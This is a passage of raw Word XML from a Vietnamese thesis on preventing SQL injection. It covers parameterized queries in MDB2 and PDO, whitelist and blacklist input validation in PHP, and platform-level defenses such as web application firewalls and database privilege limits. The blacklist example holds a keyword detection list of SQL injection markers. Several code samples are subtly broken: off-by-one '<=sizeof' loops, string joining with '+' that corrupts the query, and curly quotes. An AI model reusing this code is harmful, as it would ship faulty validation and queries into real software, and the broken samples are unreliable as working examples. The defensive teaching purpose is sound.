            <w:r w:rsidRPr="00520B88">
              <w:t>$mdb2 =&amp; MDB2::factory($dsn);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t xml:space="preserve">$sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00520B88">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00520B88">
              <w:t xml:space="preserve"> FROM users WHERE username=? AND password=?”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$types = array(‘text’, ‘text’); // set data types</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$cmd = $mdb2-&gt;prepare($sql, $types, MDB2_PREPARE_MANIP);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$data = array($username, $password); // parameters to be passed</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$result = $cmd-&gt;execute($data);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00520B88" w:rsidRDefault="006B2163" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00756590" w:rsidRPr="00756590">
        <w:t>PDO</w:t>
      </w:r>
      <w:r w:rsidR="00756590">
        <w:t xml:space="preserve"> hỗ trợ việc đánh dấu cả bằng dấu hỏi, hoặc dấu hai chấm (:)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidTr="00756590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t xml:space="preserve">$sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="006957A4">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006957A4">
              <w:t xml:space="preserve"> FROM users WHERE username=:username AND” +“password=:password”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt = $dbh-&gt;prepare($sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>// bind values and data types</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt-&gt;bindParam(‘:username’, $username, PDO::PARAM_STR, 12);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006957A4" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt-&gt;bindParam(‘:password’, $password, PDO::PARAM_STR, 12);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt-&gt;execute();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00756590" w:rsidRPr="00DB7B2D" w:rsidRDefault="00DB7B2D" w:rsidP="00DB7B2D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc459374352"/>
      <w:r w:rsidRPr="00DB7B2D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng xác nhận đầu vào (Validating input)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00D16775" w:rsidRPr="00A909F8" w:rsidRDefault="00D16775" w:rsidP="00FE3533">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F6DCD" w:rsidRPr="009F6DCD">
        <w:t>Input valid</w:t>
      </w:r>
      <w:r w:rsidR="009F6DCD">
        <w:t>ation là quá trình kiểm tra đầu vào</w:t>
      </w:r>
      <w:r w:rsidR="00F54753">
        <w:t xml:space="preserve"> bởi ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="009F6DCD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F54753">
        <w:t xml:space="preserve">đảm bảo đầu vào phù hợp với tiêu chuẩn thiết lập trước. </w:t>
      </w:r>
      <w:r w:rsidR="003E2412">
        <w:t>Thực tế có sử dụng các biểu thức chính quy (</w:t>
      </w:r>
      <w:r w:rsidR="003E2412" w:rsidRPr="003E2412">
        <w:t>regular expressions</w:t>
      </w:r>
      <w:r w:rsidR="003E2412">
        <w:t>) hay logic nghiệp vụ để kiểm tra đầ</w:t>
      </w:r>
      <w:r w:rsidR="00562F29">
        <w:t>u vào. Có hai loại kiểm tra đầu vào: danh sách whitelist và danh sách blacklist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00455D2B" w:rsidRDefault="005F7946" w:rsidP="005F7946">
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00455D2B" w:rsidRPr="005F7946">
        <w:t>ỹ thuật danh sách white-list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là chỉ chấp nhận các đầu vào được cho là tốt. </w:t>
      </w:r>
      <w:r w:rsidR="00A74FA1">
        <w:t xml:space="preserve">Nó liên quan đến các ràng buộc </w:t>
      </w:r>
      <w:r w:rsidR="007F0E35">
        <w:t xml:space="preserve">đã biết </w:t>
      </w:r>
      <w:r w:rsidR="00A74FA1">
        <w:t xml:space="preserve">liên quan đến dữ liệu sẽ được truyền vào: </w:t>
      </w:r>
      <w:r w:rsidR="007F0E35">
        <w:t>kiểu, độ dài, các tiêu chuẩn/ định dạ</w:t>
      </w:r>
      <w:r w:rsidR="003A14BC">
        <w:t>ng.. Ví dụ nếu đầu vào là số thẻ tín dụng, thì sẽ có độ dài từ 13 đến 16, và chỉ là dạng chữ số</w:t>
      </w:r>
      <w:r w:rsidR="009A5006">
        <w:t>. N</w:t>
      </w:r>
      <w:r w:rsidR="009A5006">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">goài ra, còn phải đảm bảo công thức </w:t>
      </w:r>
      <w:r w:rsidR="009A5006" w:rsidRPr="009A5006">
        <w:t>Luhn</w:t>
      </w:r>
      <w:r w:rsidR="009A5006">
        <w:t>, liên quan đến chữ số cuối cùng của dãy số.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82306" w:rsidRDefault="00A82306" w:rsidP="005F7946">
      <w:r>
        <w:t>Một cách tiếp cận tương tự trong kiểm tra dạng whitelist là: danh sách đầu vào đã biết trước</w:t>
      </w:r>
      <w:r w:rsidR="005E495B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C2C35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E495B">
        <w:t xml:space="preserve">Danh sách đầu vào là một tập các giá trị hợp lệ, nếu nằm ngoài danh sách này sẽ từ chối. </w:t>
      </w:r>
      <w:r w:rsidR="00CE3969">
        <w:t>Phương pháp này thường áp dụng trong trường hợp đầu vào là các tên bảng, tên cột, hoặc các giá trị tĩnh, không thay đổi. đối với phương pháp tối ưu dựa trên phân tích thứ tự trả về, phương pháp này đặc biệt có hiệu quả. Bởi vì đầu vào phải là một tên cột nào đó, nên chỉ cần kiểm tra đầu vào có nằm trong danh sách các tên cột đó hay không.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidTr="00AB5C7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>$whitelist_list  = array('id','name','point');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>$found = false;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>for($i=0;$i&lt;=sizeof($</w:t>
            </w:r>
            <w:r w:rsidR="00DF6A89" w:rsidRPr="00DF6A89">
              <w:t>whitelist</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>_list);$i++)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>if($whitelist_list[$i] === $input)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{ $found = true;break;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>if($found==false)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t xml:space="preserve">      echo “Attacked”; //Print alert</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t xml:space="preserve">      exit();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t xml:space="preserve">    //Do it</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C3FBD" w:rsidRDefault="000B5CFF" w:rsidP="000B5CFF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Kỹ thuật thứ</w:t>
      </w:r>
      <w:r w:rsidR="003E1679">
        <w:t xml:space="preserve"> hai là backlist, thực hiện từ chối nếu đầu vào là xấu. ban đầu, lập trình viên định nghĩa tập các mẫu để nhận diện đấy là đầu vào xấu, chứa mã tấn công. Nếu như đầu vào từ người dùng có chứa các mẫu này thì sẽ là loại bỏ, không thực hiện. Kỹ thuật này thường được triển khai phổ biến ở nhiều ứng dụng khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidTr="00E921F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:t>$black_list  = array('sleep','benchmark','union','--','#','/','*',';');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:t>for($i=0;$i&lt;=sizeof($black_list);$i++)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>$pos = strpos(strtolower($point), $black_list[$i]);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>if (is_numeric($pos))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>echo "Attack!!!!!";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>exit(0);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E921F1" w:rsidRDefault="00FF7CE2" w:rsidP="000B5CFF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F92F00">
        <w:t xml:space="preserve">Kỹ thuật blacklist có nhược điểm là chỉ có thể chặn các mẫu đã biết, đối </w:t>
      </w:r>
      <w:r w:rsidR="00F92F00">
        <w:lastRenderedPageBreak/>
        <w:t>vớ</w:t>
      </w:r>
      <w:r w:rsidR="00F92F00">
        <w:lastRenderedPageBreak/>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00F92F00">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> các mẫu chưa biết thì không thể chặn được. điều này tạo ra nguy cơ kẻ tấn công sử dụng các kỹ thuật, từ khóa câu lệnh khác để vượt qua. </w:t>
      </w:r>
      <w:r>
        <w:t>Ngoài ra, việc xây dựng hàm lọc, sử dụng các hàm so sánh chuẩn xác cũng quyết định chất lượng việc lọc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7CE2" w:rsidRDefault="00FF7CE2" w:rsidP="000B5CFF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Tuy nhiên, phương pháp blacklist này có lợi thế không phụ thuộc nhiều vào ứng dụng như phương pháp whitelist. Đa số tập mẫu nhận diện tấn công là phổ biến, được công bố rộng rãi. Việc triển khai lọc này có thể triển khai ở mức ứng dụng, hoặc lớp hệ thống như sử dụng các tường lửa mức ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B479CD" w:rsidRDefault="00B479CD" w:rsidP="00B479CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc459374353"/>
      <w:r w:rsidRPr="00B479CD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng kỹ thuật phòng thủ mức Platform level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="00B479CD" w:rsidRDefault="00C3317E" w:rsidP="00B479CD">
      <w:r>
        <w:t>Trong các phần trên, luận văn trình bày các phương pháp phòng thủ chính ở mức code-level. Trong nhiều trường hợp, việc triển khai giải pháp khắc phục chưa thể thực hiện ngay, cần một giải pháp tạm thời. Hơn nữa, việc phòng thủ cần thực hiện đảm bảo “Phòng thủ theo chiều sâu”. Do đó, cần thêm các hướng tiếp cận mức nền tảng. ở mức độ nền tảng, việc phòng chống SQL injection gồm các phương pháp chính sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3317E" w:rsidRDefault="00DE7D2F" w:rsidP="00562C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7D2F">
        <w:t>Runtime Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE7D2F" w:rsidRDefault="00DE7D2F" w:rsidP="00562C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình bảo mật máy chủ CSDL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF6183" w:rsidRDefault="00AF6183" w:rsidP="00562C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Triển khai các giải pháp an toàn khác.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF6183" w:rsidRDefault="00060E03" w:rsidP="00AF6183">
      <w:r w:rsidRPr="00060E03">
        <w:t>Runtime protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là bộ các giải pháp có thể triển khai để ngăn chặn, giảm thiểu tấn công SQL injection mức hệ thố</w:t>
      </w:r>
      <w:r w:rsidR="00B00EED">
        <w:t>ng. Các giải pháp này được triển khai, tham gia vào quá trình hoạt động của ứng dụng (runtime), trực tiếp bảo vệ ứng dụng khi đang hoạt động. Các dạng của loại hình này như:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00EED" w:rsidRDefault="004D1E53" w:rsidP="00AF6183">
      <w:r w:rsidRPr="004D1E53">
        <w:t>Web Application Firewalls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: tường lửa mức ứng dụng, đứng trước và chặn lọc, giám sát các dấu hiệu tấn công mức ứng dụng. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1E53" w:rsidRDefault="004D1E53" w:rsidP="00AF6183">
      <w:r w:rsidRPr="004D1E53">
        <w:t>Intercepting Filters</w:t>
      </w:r>
      <w:r>
        <w:t>: Các thành phần chặn lọc gói tin http, tiền xử lý trước khi đưa vào ứng dụng. Thông thườ</w:t>
      </w:r>
      <w:r w:rsidR="005B4A41">
        <w:t xml:space="preserve">ng là web server filter như </w:t>
      </w:r>
      <w:r w:rsidR="005B4A41" w:rsidRPr="005B4A41">
        <w:t>UrlScan</w:t>
      </w:r>
      <w:r w:rsidR="005B4A41">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005B4A41" w:rsidRPr="005B4A41">
        <w:t>WebKnight</w:t>
      </w:r>
      <w:r w:rsidR="005B4A41">
        <w:lastRenderedPageBreak/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6505" w:rsidRDefault="006D6505" w:rsidP="006D6505">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C16E9BB" wp14:editId="66116334">
            <wp:extent cx="5972175" cy="2249261"/>
            <wp:effectExtent l="19050" t="0" r="952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972175" cy="2249261"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6505" w:rsidRPr="00B479CD" w:rsidRDefault="006D6505" w:rsidP="006D6505">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C94B63">
        <w:t>Cấu hình bảo mật máy chủ CSDL, giúp hạn chế, giới hạn quyền thực thi. Trong trường hợp ứng dụng mắc lỗi SQL injection, các tấn công chỉ xảy ra trên bảng/CSDL được cấp phát, không thể leo thang, nâng quyền sang các CSDL khác, cũng như lợi dụng để chiếm quyền máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765278" w:rsidRPr="00765278" w:rsidRDefault="00765278" w:rsidP="00765278">
      <w:r>
        <w:t>Một vấn đề cần chú ý đó là, các nhà phát triển, quản trị không nên xem xét riêng lẻ từng phương pháp, mà cần phải xem xét một cách tổng thể</w:t>
      </w:r>
      <w:r w:rsidR="00305F5A">
        <w:t xml:space="preserve">, như là một phần của chiến lược “Phòng thủ theo chiều sâu”. </w:t>
      </w:r>
      <w:r w:rsidR="00BF78DE">
        <w:t>Không có một phương pháp, kỹ thuật nào có thể triệt để xử lý được nguy cơ mất an toàn thông tin. Đó phải là sự kết hợp của nhiều hơn một phương pháp, kỹ thuật.</w:t>
      </w:r>
    </w:p>
